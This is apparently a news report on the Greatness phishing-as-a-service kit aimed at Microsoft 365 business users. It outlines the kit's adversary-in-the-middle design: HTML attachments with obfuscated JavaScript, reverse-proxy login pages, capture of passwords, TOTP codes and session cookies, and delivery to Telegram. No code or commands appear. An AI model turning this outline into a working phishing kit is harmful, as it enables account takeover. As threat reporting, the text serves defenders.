Cybercriminals have been using an innovative phishing-as-a-service (PhaaS or PaaS) platform named Greatness to target business users of Microsoft's 365 cloud service since at least mid-2022. This platform has significantly simplified phishing attacks, making them more accessible to a wider range of attackers. Cisco Talos researcher Tiago Pereira reveals that Greatness primarily focuses on Microsoft 365 phishing pages and offers affiliates an attachment and link builder to create highly convincing decoy and login pages. These pages have features such as the victim's email address pre-filled, along with the appropriate company logo and background image extracted from the target organization's genuine Microsoft 365 login page. Notably, manufacturing, healthcare, and technology entities located in the U.S., the U.K., Australia, South Africa, and Canada have been the main targets of Greatness campaigns. There has been a surge in activity detected in December 2022 and March 2023.
Phishing kits like Greatness provide threat actors, regardless of their level of expertise, with a cost-effective and scalable solution for designing convincing login pages associated with various online services. These kits can also bypass two-factor authentication (2FA) protections. The decoy pages, which appear authentic, function as reverse proxies to harvest credentials and time-based one-time passwords (TOTPs) entered by victims. Typically, the attack begins with malicious emails containing HTML attachments. Upon opening the attachment, obfuscated JavaScript code is executed, redirecting the user to a landing page. This landing page is personalized with the recipient's email address already filled in and prompts the user to enter their password and MFA (multi-factor authentication) code. The entered credentials and tokens are then sent to the affiliate's Telegram channel, enabling unauthorized access to the compromised accounts.
The AiTM phishing kit also includes an administration panel, empowering affiliates to configure the Telegram bot, keep track of stolen information, and even create booby-trapped attachments or links. Each affiliate must possess a valid API key to load the phishing page, which also acts as a protective measure against unwanted IP addresses and facilitates covert communication with the actual Microsoft 365 login page by masquerading as the victim. Working together, the phishing kit and the API execute a 'man-in-the-middle' attack, where information is extracted from the victim and immediately submitted to the legitimate login page in real-time. This enables the PaaS affiliate to steal usernames, passwords, and authenticated session cookies, particularly when the victim is using MFA.
These findings coincide with Microsoft's efforts to enhance 2FA protections and counter prompt bombing attacks. Starting from May 8, 2023, Microsoft has implemented number matching in Microsoft Authenticator push notifications.